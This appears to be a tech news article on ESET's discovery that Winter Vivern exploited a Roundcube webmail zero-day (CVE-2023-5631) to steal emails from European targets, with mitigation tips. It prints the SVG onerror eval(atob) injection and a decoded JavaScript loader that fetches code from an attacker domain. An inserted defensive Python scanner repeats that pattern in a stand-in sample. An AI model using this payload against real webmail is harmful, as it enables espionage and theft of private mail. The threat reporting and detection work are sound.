Friday, May 17, 2024

New Cyberattack From Winter Vivern Exploits a Zero-Day Vulnerability in Roundcube Webmail


After reading the technical details about this zero-day that targeted governmental entities and a think tank in Europe and learning about the Winter Vivern threat actor, get tips on mitigating this cybersecurity attack.

ESET researcher Matthieu Faou has uncovered a new cyberattack from a cyberespionage threat actor known as Winter Vivern, whose interests align with Russia and Belarus. The attack focused on exploiting a zero-day vulnerability in Roundcube webmail, the result being the ability to list folders and emails in Roundcube accounts and to exfiltrate full emails to an attacker-controlled server. The cybersecurity company ESET noted the campaign has targeted governmental entities and a think tank in Europe. This cyberattack is no longer active.

Technical details about this cyberattack exploiting a zero-day in Roundcube

The threat actor begins the attack by sending a specially crafted email message with the subject line “Get started in your Outlook” and coming from “team.management@outlook(.)com” (Figure A).

Figure A: Malicious email message sent by Winter Vivern to its targets. Image: ESET

At the end of the email, an SVG tag contains a base64-encoded malicious payload; this is hidden from the user but present in the HTML source code. Once decoded, the malicious content is:

<svg id="x" xmlns="http://www.w3.org/2000/svg"> <image href="x" onerror="eval(atob('<base64-encoded payload>'))" /></svg>

The purpose of the malicious code is to trigger the onerror attribute by using an invalid URL ("x") in the image's href attribute: the browser fails to load it and runs the handler.

Decoding the payload in the onerror attribute results in a line of JavaScript code that will be executed in the victim's browser in the context of the user's Roundcube session:

var fe=document.createElement('script');
fe.src="https://recsecas[.]com/controlserver/checkupdate.js";
document.body.appendChild(fe);

The JavaScript injection worked on fully patched Roundcube instances at the time of Faou's discovery. The researcher was able to establish that this zero-day vulnerability was located in the server-side script rcube_washtml.php, which did not “… properly sanitize the malicious SVG document before being added to the HTML page interpreted by a Roundcube user,” as stated by Faou.

The vulnerability does not require any interaction from the user other than viewing the message in a web browser, which perhaps explains why the threat actor did not need to use a very elaborate social engineering technique; simply viewing the content triggers the exploit.
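A defender-side check suggested by the markup above, added here as an example that is not part of the original article or of ESET's or Roundcube's code: it parses an email's HTML body, flags event-handler attributes on elements inside SVG markup, and decodes any eval(atob(...)) argument so the hidden script can be reviewed without running it. The sample body and its encoded script are constructed stand-ins, not captured from the campaign.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed sample, not taken from the campaign: an HTML body with the shape
# described above (an <svg> whose <image> onerror handler runs eval(atob(...))).
SAMPLE_SCRIPT = ("var fe=document.createElement('script');"
                 "fe.src='https://example.invalid/checkupdate.js';"
                 "document.body.appendChild(fe);")
SAMPLE_HTML = ('<p>Get started in your Outlook</p>'
               '<svg id="x" xmlns="http://www.w3.org/2000/svg">'
               '<image href="x" onerror="eval(atob(\'%s\'))" /></svg>'
               % base64.b64encode(SAMPLE_SCRIPT.encode()).decode())

EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)  # onerror, onload, ...
ATOB_ARG = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

class SvgHandlerScanner(HTMLParser):
    # Collects event-handler attributes on elements inside <svg> subtrees.
    def __init__(self):
        super().__init__()
        self.svg_depth = 0  # > 0 while inside an <svg> element
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        if self.svg_depth == 0:
            return  # handlers outside SVG are out of scope for this check
        for name, value in attrs:
            if value is None or not EVENT_ATTR.match(name):
                continue
            finding = {"tag": tag, "attr": name, "handler": value, "decoded": None}
            m = ATOB_ARG.search(value)
            if m:  # surface the hidden script for the analyst; never eval it
                try:
                    finding["decoded"] = base64.b64decode(
                        m.group(1), validate=True).decode("utf-8", "replace")
                except ValueError:
                    pass  # not valid base64; keep only the raw handler
            self.findings.append(finding)

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth:
            self.svg_depth -= 1

def scan_html(html):
    # Returns one dict per event handler found inside SVG markup in the body.
    scanner = SvgHandlerScanner()
    scanner.feed(html)
    return scanner.findings
```

A mail gateway or SOC triage script can run scan_html over each HTML part and quarantine or alert on any finding, since legitimate newsletters have no reason to carry script handlers inside inline SVG.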

After this initial execution of JavaScript code, a second-stage loader, also written in JavaScript and named checkupdate.js, is executed and triggers the final stage, once again written in JavaScript (Figure B).

Figure B: Part of the final JavaScript payload that exfiltrates emails from the victim. Image: ESET

The final payload gives the attacker the ability to list all folders and emails in the current Roundcube email account and to exfiltrate email messages to a command and control server via HTTP requests.

When TechRepublic asked Faou about further compromise of the system, he replied via a written message: “We haven't observed any lateral movement. The JavaScript code is only executed in the context of (the) victim's browser, in the Roundcube window. So it doesn't have access to the backend of Roundcube and escaping the browser would require a much more complicated exploit. However, they could re-use their access to launch further phishing campaigns originating from the sender who was compromised (we haven't observed this).”

Who is Winter Vivern?

Winter Vivern, aka TA473, is a cyberespionage threat actor whose interests are closely aligned with the governments of Russia and Belarus. The first public exposure of the Winter Vivern threat actor occurred in 2021 when it targeted several governmental entities in different countries including Azerbaijan, Cyprus, India, Italy, Lithuania, Ukraine and the Vatican.

This threat actor has a history of exploiting webmail software, as it has already abused older Roundcube vulnerabilities and known Zimbra webmail vulnerabilities to target elected officials and staffers in the U.S. as well as experts in European politics and economics. The threat actor also targeted mailboxes of NATO-aligned government entities in Europe.

The threat actor often uses malicious documents and sometimes a PowerShell backdoor to compromise its targets. Winter Vivern uses vulnerability scanners such as Acunetix, probably to scan targeted networks.

ESET noted that Winter Vivern has been observed exploiting CVE-2020-35730, a known Roundcube vulnerability, against entities that are also targeted by the threat actor APT28, which has been described as military unit 26165 of Russia's military intelligence agency, previously known as the GRU.

In addition, ESET pointed out a possible link to the threat actor MoustachedBouncer, which runs attacks against foreign diplomats in Belarus. Asked about it, Faou told TechRepublic that “there are quite unique similarities in the network infrastructure of both groups, suggesting that a common entity may provide it to both of them.”

As stated by ESET regarding the current threat, “Despite the low sophistication of the group's toolset, it is a threat to governments in Europe because of its persistence, very regular running of phishing campaigns, and because a significant number of internet-facing applications are not regularly updated although they are known to contain vulnerabilities.”

How to protect users from this cybersecurity threat

ESET reported the CVE-2023-5631 vulnerability to Roundcube on Oct. 12, 2023; Roundcube patched it on Oct. 14, 2023 and released security updates addressing the vulnerability on Oct. 16, 2023 in versions 1.6.4, 1.4.15 and 1.5.5. It is strongly advised to patch Roundcube for this vulnerability.

It is recommended to keep all operating systems and software up to date and patched to avoid further compromise through common vulnerabilities.

Disabling JavaScript execution in the browser would mitigate this threat, but it would greatly degrade the user's experience because many websites rely heavily on JavaScript to function.

Disclosure: I work for Trend Micro, but the views expressed in this article are mine.
